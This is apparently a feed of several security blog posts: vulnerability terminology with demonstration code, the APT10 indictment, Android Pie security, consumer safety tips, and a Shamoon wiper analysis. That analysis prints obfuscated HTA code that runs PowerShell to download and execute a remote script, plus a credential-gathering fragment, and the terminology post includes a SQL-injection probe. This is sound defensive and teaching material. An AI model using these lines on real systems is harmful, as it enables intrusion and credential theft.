For some guidance when it comes to flaws, a helpful resource is MITRE’s Common Weakness Enumeration (CWE) list, which provides a common baseline standard for identifying different classes of weaknesses within application structures that can result in possible vulnerabilities.

Only when there is a realization of a structural defect that can allow for an attack to occur does a vulnerability arise. Vulnerabilities, similarly to flaws, are categorized by MITRE’s Common Vulnerabilities and Exposures (CVE) list. Generally, when we’re looking at CVE entries, these are recognized, publicly-known cybersecurity vulnerabilities within existing codebases. Additionally, you could reference the National Institute of Standards and Technology’s National Vulnerability Database (NVD), which is updated whenever a new vulnerability is added to the CVE dictionary of vulnerabilities. The NVD supplements the CVE list by conducting additional analysis on the vulnerabilities, and by determining the impact that vulnerabilities can have on an organization.

Exploits

“Exploit” is often used to describe weaknesses in code where hacking can occur, but in reality, it’s a slightly different concept. Rather than being a weakness in code, the term “exploit” refers to a procedure or program intended to take advantage of a vulnerability. Another way to think about it is this – an exploit is a vulnerability “weaponized” for a purpose, and this is because an exploit makes use of a vulnerability to attack a system.

So, to reiterate, rather than being the weakness in the code, an exploit is how you would attack that code. It allows an attacker to utilize the application’s logic against it in a way that was never intended by the developers.

As we can see, each of these concepts has its own distinct meaning, and yet they are closely tied together in the world of application security: flaws exist within a code base that is being attacked, the flaw being the weakness, the vulnerability being the realization of it, and the exploit being how that vulnerability would be leveraged and attacked.
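The flaw-versus-vulnerability distinction is easiest to see in code whose call graph changes over time. The block below is an added example written for this page, not the Veracode post's own material: a query builder has an implementation flaw (SQL built by string concatenation, the CWE-89 pattern) but is first reached only with a constant, so the flaw is latent; a later feature routes user-controlled input into the same function without touching it, and the identical flaw is now an exploitable condition. The in-memory table, the names, and the functions are constructed for the illustration; the parameterized version shows the remediation.

```python
"""A latent flaw that becomes a vulnerability when untrusted input reaches it.

Added example (not from the original post). The table and names are
constructed; find_user_flawed is deliberately left defective as the 'before'.
"""
import sqlite3


def make_db():
    """Constructed in-memory table with three users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "admin"), ("alice", "staff"), ("bob", "staff")],
    )
    return conn


def find_user_flawed(conn, name):
    """FLAW: builds SQL by concatenating the name into the statement (CWE-89).
    Whether this is a *vulnerability* depends on who controls `name`."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


ADMIN_NAME = "admin"  # compile-time constant


def admin_row(conn):
    """Original caller: only a constant reaches the flawed function, so the
    defect exists but is not reachable by an attacker (flaw, not vulnerability)."""
    return find_user_flawed(conn, ADMIN_NAME)


def search_users_vulnerable(conn, user_supplied):
    """Later feature: untrusted input now flows into the same flawed function.
    Nothing in find_user_flawed changed, yet it is now a vulnerability."""
    return find_user_flawed(conn, user_supplied)


def search_users_fixed(conn, user_supplied):
    """Remediation: a parameterized query. The input is bound as data and can
    never alter the statement, so the flaw is removed rather than hidden."""
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (user_supplied,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"  # input that turns the latent flaw into a real defect
    print("constant caller:", admin_row(db))
    print("vulnerable caller, probe input:", search_users_vulnerable(db, probe))
    print("fixed caller, probe input:", search_users_fixed(db, probe))
```

A static analyzer reports the concatenation in `find_user_flawed` in both versions of the program; only knowledge of the callers (context and architecture, as the next section puts it) tells you whether it is currently exploitable. That is why the fix belongs in the flawed function itself rather than in whichever caller happens to be dangerous today.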

Testing Methods

Now that you have an understanding of the distinctions between these terms, you might be wondering how to test for flaws and vulnerabilities in your code. After all, step one is awareness, but step two is knowing how to find and prevent these defects from putting your data at risk.

Static Application Security Testing (or SAST) is going to help you find the flaws in your code that could be possible vulnerabilities. Static analysis estimates – but does not prove – the exploitability of these flaws so that you can prioritize which to fix first. Knowing whether or not these flaws are certain vulnerabilities takes more of an understanding of the context in which the application is being run and the architecture of the application.

Your next line of defense comes in the form of Dynamic Application Security Testing (DAST), and Manual Penetration Testing (commonly known as MPT). These testing methods are typically more familiar to developers, as they’ve historically been the common approaches for assessing applications for vulnerabilities. Dynamic analysis and MPTs run against a live application, and because they’re testing the code behavior from the outside in, we can actually see if these vulnerabilities are exploitable.

The third type of assessment at your disposal is Software Composition Analysis (SCA). SCA focuses on identifying risks that might be introduced by open source code components and third party libraries. It does this by scanning against an inventory of known, documented vulnerabilities – like the National Vulnerability Database.

While each testing method has unique upsides and drawbacks, they all have their place within the software development lifecycle. By using all three together in an integrated manner, you’ll be able to assess when risk exists within an application, and furthermore, you’ll be protecting yourself at every stage within your SDLC.
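The SCA step described above, matching an application's component inventory against a catalog of known, documented vulnerabilities, reduces to a version-range comparison. Here is an added example written for this page, not a product's code: it reads a constructed dependency manifest, compares each pinned version against a constructed advisory inventory with affected version ranges, and returns the matches with the version that fixes each. The advisory identifiers are placeholders, not real CVE numbers, and the version parser is a simplification (numeric dotted versions only).

```python
"""Minimal software composition analysis (SCA) matcher (added example).

Matches a constructed manifest against a constructed advisory inventory with
version ranges, the way SCA tools match against sources like the NVD.
Advisory ids are placeholders; the version parser handles numeric dotted
versions only (assumption for the illustration).
"""
import re

# Constructed manifest in pip requirements style.
MANIFEST = """
# pinned dependencies (constructed sample)
requests==2.19.1
pyyaml==3.12
cryptography==2.4.2
"""

# Constructed inventory: package -> [(advisory_id, affected_range, fixed_in)].
# affected_range is a comma-separated list of comparisons, all of which must hold.
ADVISORIES = {
    "requests": [("ADVISORY-0001", ">=2.0.0,<2.20.0", "2.20.0")],
    "pyyaml": [("ADVISORY-0002", "<4.1", "4.1")],
    "cryptography": [("ADVISORY-0003", "<2.3", "2.3")],
}

_CLAUSE = re.compile(r"^(>=|<=|==|>|<)\s*(.+)$")
_OPS = {
    ">=": lambda c: c >= 0,
    "<=": lambda c: c <= 0,
    "==": lambda c: c == 0,
    ">": lambda c: c > 0,
    "<": lambda c: c < 0,
}


def parse_version(text):
    """'2.19.1' -> (2, 19, 1). A non-numeric tail ends parsing (assumption)."""
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def _compare(a, b):
    """Three-way compare with zero padding so that 2.3 == 2.3.0."""
    n = max(len(a), len(b))
    a = a + (0,) * (n - len(a))
    b = b + (0,) * (n - len(b))
    return (a > b) - (a < b)


def in_range(version, affected_range):
    """True if version satisfies every clause of the affected range."""
    v = parse_version(version)
    for clause in affected_range.split(","):
        m = _CLAUSE.match(clause.strip())
        if not m:
            raise ValueError(f"bad range clause: {clause!r}")
        op, bound = m.groups()
        if not _OPS[op](_compare(v, parse_version(bound))):
            return False
    return True


def parse_manifest(text):
    """Return {package_name: pinned_version} from 'name==version' lines."""
    deps = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, sep, version = line.partition("==")
        if sep:
            deps[name.strip().lower()] = version.strip()
    return deps


def scan(manifest_text, advisories=ADVISORIES):
    """Return a list of (package, version, advisory_id, fixed_in) findings."""
    findings = []
    for pkg, version in parse_manifest(manifest_text).items():
        for advisory_id, affected_range, fixed_in in advisories.get(pkg, []):
            if in_range(version, affected_range):
                findings.append((pkg, version, advisory_id, fixed_in))
    return findings


if __name__ == "__main__":
    for pkg, version, advisory_id, fixed_in in scan(MANIFEST):
        print(f"{pkg}=={version}: {advisory_id}, fixed in {fixed_in}")
```

Note what this does and does not tell you: a match means a vulnerable version is present, which is the flaw-level signal; whether the application actually calls the affected code path (the "vulnerable method" question) needs call-graph analysis on top of the version match.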

To learn even more about these security defects discussed here, and how to remediate them once you’ve found them, check out this webinar.

Indictment of Chinese Hackers Underscores Need for Stronger Cybersecurity


According to a newly unsealed indictment, two Chinese nationals working with the Chinese ministry of state security have been charged with hacking a number of U.S. government agencies and corporations. The court filing indicates that Zhu Hua and Zhang Jianguo, members of Advanced Persistent Threat 10 (APT10), used phishing techniques in order to steal intellectual property, confidential business data, and technological information between 2006 and 2018.  

The APT10 Group was able to access more than 40 computers to steal confidential data from the U.S. Department of the Navy, including the personally identifiable information of more than 100,000 Navy personnel. The NASA Goddard Space Center and the space agency’s Jet Propulsion Lab were also named in the filing, according to a report in TechCrunch.

Tailored and Convincing Spearphishing Gave APT10 Unfettered Access

Rather than taking a spray-and-pray approach to their attack, APT10 carefully selected their targets and created tailored email campaigns to trick the recipient into opening malicious Word document attachments and files. The emails appeared to originate from a trusted sender, the filenames and file types looked legitimate, and the content pertained to something relevant to the victim. An example included in the indictment involved a helicopter manufacturer that received an email with the subject line, “C17 Antenna problems” that included a malicious Microsoft Word attachment named “12-204 Side Load testing.doc.”

This methodology created an air of safety and allowed the email recipients to open the emails and attachments without suspicion or question. The indictment indicates that the malware used in the campaigns typically included customized variants of a remote access Trojan (RAT), including one called Poison Ivy, and keystroke loggers used to steal usernames and passwords as users typed in their credentials.

The “Technology Theft Campaign”

Over the course of this campaign, members of APT10 – including Hua and Jianguo – gained access to approximately 90 computers belonging to commercial and defense technology companies, as well as U.S. Government agencies in at least 12 states. They stole hundreds of gigabytes of sensitive data and targeted the computers of companies across dozens of industries and technologies, including aviation, space and satellite, manufacturing, pharmaceutical, oil and gas exploration and production, communications, computer processing, and maritime.  

The “MSP Theft Campaign”

In 2014, the defendants and co-conspirators in APT10 hacked into the computers and networks for managed service providers (MSP) for businesses and governments around the world. Because MSPs are responsible for remotely managing their clients’ information technology infrastructure – like servers, storage, networking, consulting and support services – the attackers were able to steal intellectual property and confidential business data on a global scale. The indictment states that through one particular MSP, which supports operations for the Southern District of New York, the group was able to access data of clients from 12 different countries across dozens of industries, including banking and finance, healthcare, and biotechnology. The malware used in this campaign was programmed to communicate with domains hosted by DNS service providers that were assigned IP addresses of computers APT10 controlled. In total, the group registered roughly 1,300 unique malicious domains.

Stronger Security Hygiene Is Necessary to Avoid Digital Theft

Although prosecutions are unlikely, the details of the indictment clearly indicate that if a tech company is vulnerable, its valuable intellectual property and personal data can be taken.

“Tech companies aren’t ramping up their security to protect their IP and data commensurate with the value attackers put on the data,” said Veracode CTO Chris Wysopal. “Compromising endpoints with vulnerable Word Documents means there isn’t good endpoint hygiene. Microsoft has recently released Windows Sandbox for Windows Pro and Enterprise users.  It would be a good idea to open externally sourced Word Documents with Word running in Windows Sandbox.”

Android Pie à la mode: Security & Privacy

Posted by Vikrant Nanda and René Mayrhofer, Android Security & Privacy Team

[Cross-posted from the Android Developers Blog]


There is no better time to talk about Android dessert releases than the holidays because who doesn't love dessert? And what is one of our favorite desserts during the holiday season? Well, pie of course.

In all seriousness, pie is a great analogy because of how the various ingredients turn into multiple layers of goodness: right from the software crust on top to the hardware layer at the bottom. Read on for a summary of security and privacy features introduced in Android Pie this year.

Platform hardening

With Android Pie, we updated File-Based Encryption to support external storage media (such as expandable storage cards). We also introduced support for metadata encryption where hardware support is present. With filesystem metadata encryption, a single key present at boot time encrypts whatever content is not encrypted by file-based encryption (such as directory layouts, file sizes, permissions, and creation/modification times).

Android Pie also introduced a BiometricPrompt API that apps can use to provide biometric authentication dialogs (such as a fingerprint prompt) on a device in a modality-agnostic fashion. This functionality creates a standardized look, feel, and placement for the dialog. This kind of standardization gives users more confidence that they're authenticating against a trusted biometric credential checker.

New protections and test cases for the Application Sandbox help ensure all non-privileged apps targeting Android Pie (and all future releases of Android) run in stronger SELinux sandboxes. By providing per-app cryptographic authentication to the sandbox, this protection improves app separation, prevents overriding safe defaults, and (most significantly) prevents apps from making their data widely accessible.

Anti-exploitation improvements

With Android Pie, we expanded our compiler-based security mitigations, which instrument runtime operations to fail safely when undefined behavior occurs.

Control Flow Integrity (CFI) is a security mechanism that disallows changes to the original control flow graph of compiled code. In Android Pie, it has been enabled by default within the media frameworks and other security-critical components, such as for Near Field Communication (NFC) and Bluetooth protocols. We also implemented support for CFI in the Android common kernel, continuing our efforts to harden the kernel in previous Android releases.

Integer Overflow Sanitization is a security technique used to mitigate memory corruption and information disclosure vulnerabilities caused by integer operations. We've expanded our use of Integer Overflow sanitizers by enabling their use in libraries where complex untrusted input is processed or where security vulnerabilities have been reported.

Continued investment in hardware-backed security

One of the highlights of Android Pie is Android Protected Confirmation, the first major mobile OS API that leverages a hardware-protected user interface (Trusted UI) to perform critical transactions completely outside the main mobile operating system. Developers can use this API to display a trusted UI prompt to the user, requesting approval via a physical protected input (such as a button on the device). The resulting cryptographically signed statement allows the relying party to reaffirm that the user would like to complete a sensitive transaction through their app.

We also introduced support for a new Keystore type that provides stronger protection for private keys by leveraging tamper-resistant hardware with dedicated CPU, RAM, and flash memory. StrongBox Keymaster is an implementation of the Keymaster hardware abstraction layer (HAL) that resides in a hardware security module. This module is designed and required to have its own processor, secure storage, True Random Number Generator (TRNG), side-channel resistance, and tamper-resistant packaging.

Other Keystore features (as part of Keymaster 4) include Keyguard-bound keys, Secure Key Import, 3DES support, and version binding. Keyguard-bound keys enable use restriction so as to protect sensitive information. Secure Key Import facilitates secure key use while protecting key material from the application or operating system. You can read more about these features in our recent blog post as well as the accompanying release notes.

Enhancing user privacy

User privacy has been boosted with several behavior changes, such as limiting the access background apps have to the camera, microphone, and device sensors. New permission rules and permission groups have been created for phone calls, phone state, and Wi-Fi scans, as well as restrictions around information retrieved from Wi-Fi scans. We have also added associated MAC address randomization, so that a device can use a different network address when connecting to a Wi-Fi network.

On top of that, Android Pie added support for encrypting Android backups with the user's screen lock secret (that is, PIN, pattern, or password). By design, this means that an attacker would not be able to access a user's backed-up application data without specifically knowing their passcode. Auto backup for apps has been enhanced by providing developers a way to specify conditions under which their app's data is excluded from auto backup. For example, Android Pie introduces a new flag to determine whether a user's backup is client-side encrypted.

As part of a larger effort to move all web traffic away from cleartext (unencrypted HTTP) and towards being secured with TLS (HTTPS), we changed the defaults for Network Security Configuration to block all cleartext traffic. We're protecting users with TLS by default, unless you explicitly opt-in to cleartext for specific domains. Android Pie also adds built-in support for DNS over TLS, automatically upgrading DNS queries to TLS if a network's DNS server supports it. This protects information about IP addresses visited from being sniffed or intercepted on the network level.
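The cleartext default is expressed through an app's Network Security Configuration file, and auditing that file is a routine step when reviewing an app built for Pie. The block below is an added example, not code from the Android post: it evaluates whether plain HTTP is permitted for a given host under a configuration, applying the precedence the platform documents (the most specific matching domain-config wins, then base-config, then the platform default, which is "blocked" for apps targeting API 28 and later). The sample configuration is constructed to show a narrow, explicit opt-in for one legacy host; nested domain-config inheritance is out of scope here (an assumption of this simplified checker).

```python
"""Cleartext audit of an Android network_security_config.xml (added example).

Implements the lookup order: most specific matching <domain-config>, then
<base-config>, then the platform default (cleartext blocked when the app
targets API 28 / Android Pie or newer). Nested <domain-config> inheritance is
not modelled (assumption). The sample config is constructed.
"""
import xml.etree.ElementTree as ET

# Constructed sample: default deny, one explicit opt-in, one carve-out under it.
SAMPLE_CONFIG = """
<network-security-config>
    <base-config cleartextTrafficPermitted="false" />
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true">legacy.example.com</domain>
    </domain-config>
    <domain-config cleartextTrafficPermitted="false">
        <domain includeSubdomains="false">secure.legacy.example.com</domain>
    </domain-config>
</network-security-config>
"""

PIE_API_LEVEL = 28


def _to_bool(value, default):
    """Parse an XML boolean attribute; return default when absent."""
    if value is None:
        return default
    return value.strip().lower() == "true"


def parse_config(xml_text):
    """Return (base_permitted_or_None, [(domain, include_subdomains, permitted), ...]).

    `permitted` is None when a domain-config carries no explicit attribute, in
    which case the lookup falls through to base-config / platform default.
    """
    root = ET.fromstring(xml_text)
    base = root.find("base-config")
    base_permitted = None
    if base is not None:
        base_permitted = _to_bool(base.get("cleartextTrafficPermitted"), None)
    rules = []
    for dc in root.findall("domain-config"):  # top-level only (assumption)
        permitted = _to_bool(dc.get("cleartextTrafficPermitted"), None)
        for d in dc.findall("domain"):
            rules.append((
                (d.text or "").strip().lower().rstrip("."),
                _to_bool(d.get("includeSubdomains"), False),
                permitted,
            ))
    return base_permitted, rules


def cleartext_permitted(host, xml_text, target_sdk=PIE_API_LEVEL):
    """Decide whether cleartext traffic to `host` is allowed under the config."""
    base_permitted, rules = parse_config(xml_text)
    host = host.lower().rstrip(".")
    best = None  # (specificity, permitted) for the most specific match
    for domain, include_subdomains, permitted in rules:
        exact = host == domain
        sub = include_subdomains and host.endswith("." + domain)
        if exact or sub:
            specificity = len(domain)
            if best is None or specificity > best[0]:
                best = (specificity, permitted)
    if best is not None and best[1] is not None:
        return best[1]
    if base_permitted is not None:
        return base_permitted
    # Platform default: allowed before Pie, blocked from Pie (API 28) onward.
    return target_sdk < PIE_API_LEVEL


def cleartext_optins(xml_text):
    """List the domains a config explicitly opens to cleartext (review aid)."""
    _, rules = parse_config(xml_text)
    return sorted(d for d, _, permitted in rules if permitted is True)


if __name__ == "__main__":
    for h in ("legacy.example.com", "api.legacy.example.com",
              "secure.legacy.example.com", "example.com"):
        print(f"{h}: cleartext {'allowed' if cleartext_permitted(h, SAMPLE_CONFIG) else 'blocked'}")
    print("explicit opt-ins:", cleartext_optins(SAMPLE_CONFIG))
```

When reviewing an app, `cleartext_optins` gives the list worth questioning: each entry is a host for which the Pie default has been switched off, and a `<base-config cleartextTrafficPermitted="true">` with no domain scoping is the setting that silently reverts the whole app to pre-Pie behaviour.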


We believe that the features described in this post advance the security and privacy posture of Android, but you don't have to take our word for it. Year after year our continued efforts are demonstrably resulting in better protection as evidenced by increasing exploit difficulty and independent mobile security ratings. Now go and enjoy some actual pie while we get back to preparing the next Android dessert release!

Making Android more secure requires a combination of hardening the platform and advancing anti-exploitation techniques.


Acknowledgements: This post leveraged contributions from Chad Brubaker, Janis Danisevskis, Giles Hogben, Troy Kensinger, Ivan Lozano, Vishwath Mohan, Frank Salim, Sami Tolvanen, Lilian Young, and Shawn Willden.

How to Get Technology Working for You This Christmas

Harnessing the power of the internet and technology this Christmas may just be what you need to get over this extraordinarily stressful period. While many of you may be all sorted for the big day, there are still many of us who aren’t.

Many of us are still attending daily Christmas gatherings, still working, still trying to entertain kids, shop & most importantly, work out what we are going to serve to 25 people on Christmas day!!

So, let me share with you my top tips on how we can all use the wonders of the internet and technology to get through:

  1. E-Cards

If you haven’t done these yet – and let’s be honest very few do now – then scrap this idea immediately. But if your guilt just can’t be silenced then check out ecards. I personally love Smilebox but Lifewire has put together a list of the top ecard sites. But remember, always use a reputable site so your recipients are more likely to open them. Cybercrims have been known to send unsuspecting recipients ecards with the aim of trying to extract their personal information.

  2. Online Gift Shopping

Getting to the bottom of the Christmas gift list takes time. So, if you still have presents to buy then avoid the crowds and get online. There are still plenty of retailers who are guaranteeing delivery before Christmas. So, make yourself a cup of tea and set the timer for an hour. You’ll be surprised how much you can get done when you have a deadline! Finder.com has put together a list of the top 50 Australian shopping sites – check it out! I do have to disclose I have a soft spot for Peter’s of Kensington, Country Road and Myer online. Great service and speedy delivery!

But please remember to observe safe online shopping habits. Only buy from trusted retailers, look for a padlock at the start of a web address to ensure transactions are encrypted, avoid offers that are ‘too good to be true’ and don’t ever use public Wi-Fi to do your shopping.

  3. Get Some Extra Help Online

If you haven’t yet used Airtasker to help you work through your to-do list, then you need to start ASAP. Airtasker brings jobs and helpers together in an easy to use app. If your house needs a clean or the garden needs a makeover before the relatives arrive, then log on and create a job and wait for Airtaskers to bid on it. So easy!

  4. Create an Online To-Do List

There’s nothing like a bit of planning to reduce pressure. Why not create a to-do list in Google Docs or an Excel spreadsheet to identify which family member is responsible for what on the big day? Alternatively, you could create your to-do list in an app like Todoist and then send each person’s task directly to their inbox? Very organised indeed!

So, let’s all take a deep breath. Christmas 2018 is going to be fantastic. Let’s get technology working for us so we can get through our to-do lists and be super parents – even though we all know they just don’t exist!

Merry Christmas

Alex xx

The post How to Get Technology Working for You This Christmas appeared first on McAfee Blogs.

The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite

Today, we are all pretty reliant on our mobile technology. From texting, to voice messaging, to mobile banking, we have a world of possibilities at our fingertips. But what happens when the bad guys take advantage of our reliance on mobile and IoT technology to threaten our cybersecurity? According to the latest McAfee Labs Threats Report, cybercriminals are leveraging fake apps and banking trojans to access users’ personal and financial information. In fact, our researchers saw an average of 480 new threats per minute and a sharp increase in malware targeting IoT devices during the last quarter. Let’s take a look at how these cyberthreats gained traction over the past few months.

While new mobile malware declined by 24% in Q3, our researchers did notice some unusual threats fueled by fake apps. Back in June, we observed a scam where crooks released YouTube videos with fake links disguised as leaked versions of Fortnite’s Android app. If a user clicked on the link to download this phony app, they would be asked to provide mobile verification. This verification process would prompt them to download app after app, putting money right in the cybercriminals’ pockets for increased app downloads.

Another fake app scheme that caught the attention of our researchers was Android/TimpDoor. This SMS phishing campaign tricked users into clicking on a link sent to them via text. The link would direct them to a fabricated web page urging them to download a fake voice messaging app. Once the victim downloaded the fake app, the malware would begin to collect the user’s device information. Android/TimpDoor would then be able to let cybercriminals use the victim’s device to access their home network.

Our researchers also observed some peculiar behavior among banking trojans, a type of malware that disguises itself as a genuine app or software to obtain a user’s banking credentials. In Q3, cybercriminals employed uncommon file types to carry out spam email campaigns, accounting for nearly 500,000 emails sent worldwide. These malicious phishing campaigns used phrases such as “please confirm” or “payment” in the subject line to manipulate users into thinking the emails were of high importance. If a user clicked on the message, the banking malware would be able to bypass the email protection system and infect the device. Banking trojans were also found using two-factor operations in web injects, or packages that can remove web page elements and prevent a user from seeing a security alert. Because these web injects removed the need for two-factor authentication, cybercriminals could easily access a victim’s banking credentials from right under their noses.

But don’t worry – there’s good news. By reflecting on the evolving landscape of cybersecurity, we can better prepare ourselves for potential threats. Therefore, to prepare your devices for schemes such as these, follow these tips:

  • Go directly to the source. Websites like YouTube often host links to fake websites and apps so that criminals can make money off downloads. Avoid falling victim to these frauds by downloading software only from a company’s home page.
  • Click with caution. Only click on links in text messages that come from trusted sources. If you receive a text message from an unknown sender, stay cautious and avoid interacting with it.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite appeared first on McAfee Blogs.

Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems

Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon “wiper” malware attacks that struck several companies in the Middle East and Europe. In that analysis we discussed one difference from previous Shamoon campaigns: the latest version has a modular approach that allows the wiper to be used as a standalone threat.

After further analysis of the three versions of Shamoon and based on the evidence we describe here, we conclude that the Iranian hacker group APT33—or a group masquerading as APT33—is likely responsible for these attacks.

In the Shamoon attacks of 2016–2017, the adversaries used both the Shamoon Version 2 wiper and the wiper Stonedrill. In the 2018 attacks, we find the Shamoon Version 3 wiper as well as the wiper Filerase, first mentioned by Symantec.

These new wiper samples (Filerase) differ from the Shamoon Version 3, which we analyzed last week. The latest Shamoon appears to be part of a toolkit with several modules. We identified the following modules:

  • OCLC.exe: Reads a list of targeted computers created by the attackers and is responsible for running the second tool, spreader.exe, with that list.
  • Spreader.exe: Spreads the file eraser to each machine on the list. It also collects the OS version.
  • SpreaderPsexec.exe: Similar to spreader.exe but uses psexec.exe to execute the wiper remotely.
  • SlHost.exe: The new wiper, which walks the targeted system and deletes every file.

The attackers have essentially packaged an old version (V2) of Shamoon with an unsophisticated toolkit coded in .Net. This suggests that multiple developers have been involved in preparing the malware for this latest wave of attacks. In our last post, we observed that Shamoon is a modular wiper that can be used by other groups. With these recent attacks, this supposition seems to be confirmed. We have learned that the adversaries prepared months in advance for this attack, with the wiper execution as the goal.

This post provides additional insight about the attack and a detailed analysis of the .Net tool kit.

Geopolitical context

The motivation behind the attack is still unclear. Shamoon Version 1 attacked just two targets in the Middle East. Shamoon Version 2 attacked multiple targets in Saudi Arabia. Version 3 went after companies in the Middle East by using their suppliers in Europe, in a supply chain attack.

Inside the .Net wiper, we discovered the following ASCII art:

These characters resemble the Arabic text تَبَّتْ يَدَا أَبِي لَهَبٍ وَتَبَّ. This is a phrase from the Quran (Surah Masad, Ayat 1 [111:1]) that means “perish the hands of the Father of flame” or “the power of Abu Lahab will perish, and he will perish.” What does this mean in the context of a cyber campaign targeting energy industries in the Middle East?

Overview of the attack

How did the malware get onto the victim’s network?

We received intelligence that the adversaries had created websites closely resembling legitimate domains which carry job offerings. For example:

  • Hxxp://possibletarget.ddns.com:880/JobOffering.

Many of the URLs we discovered were related to the energy sector, operating mostly in the Middle East. Some of these sites contained malicious HTML application files that execute other payloads; others lured victims into logging in with their corporate credentials. According to our telemetry, this preliminary credential-gathering phase seems to have started by the end of August 2018.

A code example from one malicious HTML application file:

YjDrMeQhBOsJZ = "WS"
wcpRKUHoZNcZpzPzhnJw = "crip"
RulsTzxTrzYD = "t.Sh"
MPETWYrrRvxsCx = "ell"
PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)
OoOVRmsXUQhNqZJTPOlkymqzsA = new ActiveXObject(PCaETQQJwQXVJ)
ULRXZmHsCORQNoLHPxW = "cm"
zhKokjoiBdFhTLiGUQD = "d.e"
KoORGlpnUicmMHtWdpkRwmXeQN = "xe"
KoORGlpnUicmMHtWdp = "."
KoORGlicmMHtWdp = "('http://mynetwork.ddns.net:880/*****.ps1')"
OoOVRmsXUQhNqZJTPOlkymqzsA.run('%windir%\\System32\\' + FKeRGlzVvDMH + ' /c powershell -w 1 IEX (New-Object Net.WebClient)' + KoORGlpnUicmMHtWdp + 'downloadstring' + KoORGlicmMHtWdp)
OoOVRmsXUQhNqZJTPOlkymqzsA.run('%windir%\\System32\\' + FKeRGlzVvDMH + ' /c powershell -window hidden -enc

The preceding script opens a command shell on the victim’s machine and downloads a PowerShell script from an external location. From another location, it loads a second file to execute.
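The string-splitting seen above can be undone mechanically. The following Python is an added example, not code from the McAfee analysis: it walks a constructed sample written in the same style (junk variable names, placeholder hostname), resolves the ActiveXObject name and the run() arguments, and leaves names that are never assigned (as FKeRGlzVvDMH is in the excerpt) visible as markers so the analyst sees what is still missing.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the style of the HTA excerpt above; it is not the
# page's own code and example.invalid is a placeholder hostname.
SAMPLE_HTA = r"""
aA = "WS"
bB = "crip"
cC = "t.Sh"
dD = "ell"
shellName = (aA + bB + cC + dD)
sh = new ActiveXObject(shellName)
e1 = "cm"
e2 = "d.e"
e3 = "xe"
exe = (e1 + e2 + e3)
dot = "."
arg = "('http://example.invalid:880/stage.ps1')"
sh.run('%windir%\\System32\\' + exe + ' /c powershell -w 1 IEX (New-Object Net.WebClient)' + dot + 'downloadstring' + arg)
sh.run('%windir%\\System32\\' + missingVar + ' /c powershell -window hidden -enc ' + blob)
"""

# A string literal in either quote style, or an identifier. '+', parentheses
# and whitespace carry no value in a plain concatenation, so they are skipped.
TOKEN_RE = re.compile(r'''"([^"]*)"|'([^']*)'|([A-Za-z_]\w*)''')
ASSIGN_RE = re.compile(r"^([A-Za-z_]\w*)\s*=\s*(.+?)\s*;?$")
NEW_RE = re.compile(r"^new\s+ActiveXObject\s*\((.*)\)$")
CALL_RE = re.compile(r"^([A-Za-z_]\w*)\.(\w+)\s*\((.*)\)\s*;?$")


def resolve(expr: str, env: Dict[str, str]) -> str:
    """Evaluate a concatenation of literals and previously assigned variables."""
    parts: List[str] = []
    for dq, sq, ident in TOKEN_RE.findall(expr):
        if ident:
            # A name that was never assigned stays visible as <name>.
            parts.append(env.get(ident, "<" + ident + ">"))
        else:
            literal = dq if dq else sq
            parts.append(literal.replace("\\\\", "\\"))  # JScript backslash escape
    return "".join(parts)


def deobfuscate(script: str) -> Dict[str, object]:
    """Track variables, created COM objects and method calls, line by line."""
    env: Dict[str, str] = {}
    objects: Dict[str, str] = {}
    calls: List[Tuple[str, str, str]] = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        call = CALL_RE.match(line)
        if call:
            obj, method, args = call.groups()
            calls.append((objects.get(obj, obj), method, resolve(args, env)))
            continue
        assign = ASSIGN_RE.match(line)
        if assign:
            name, rhs = assign.groups()
            created = NEW_RE.match(rhs)
            if created:
                objects[name] = resolve(created.group(1), env)  # e.g. WScript.Shell
            else:
                env[name] = resolve(rhs, env)
    return {"strings": env, "objects": objects, "calls": calls}


URL_RE = re.compile(r"https?://[^\s'\"()]+")


def extract_urls(result: Dict[str, object]) -> List[str]:
    """Collect download locations from resolved call arguments for blocking and hunting."""
    found = set()
    for _, _, args in result["calls"]:
        found.update(URL_RE.findall(args))
    return sorted(found)


if __name__ == "__main__":
    report = deobfuscate(SAMPLE_HTA)
    for obj, method, args in report["calls"]:
        print(f"{obj}.{method}({args})")
    print("URLs:", extract_urls(report))
```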

We discovered one of the PowerShell scripts. Part of the code shows they were harvesting usernames, passwords, and domains:

function primer {
if ($env:username -eq "$($env:computername)$"){$u="NT AUTHORITY\SYSTEM"}else{$u=$env:username}
$o="$env:userdomain\$u
$env:computername
$env:PROCESSOR_ARCHITECTURE

With legitimate credentials for a network, it is easy to log in and spread the wipers.

.Net tool kit

The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase.

The first component (OCLC.exe) reads two text files stored in two local directories, “shutter” and “light”, which contain the list of targeted machines.

OCLC.exe starts a new hidden command window process to run the second component, spreader.exe, which spreads the Shamoon variant and Filerase with the concatenated text file as parameter.

The spreader component takes as a parameter the text file that contains the list of targeted machines and the Windows version. It first checks the Windows version of the targeted computers.

The spreader places the executable files (Shamoon and Filerase) into the folder Net2.

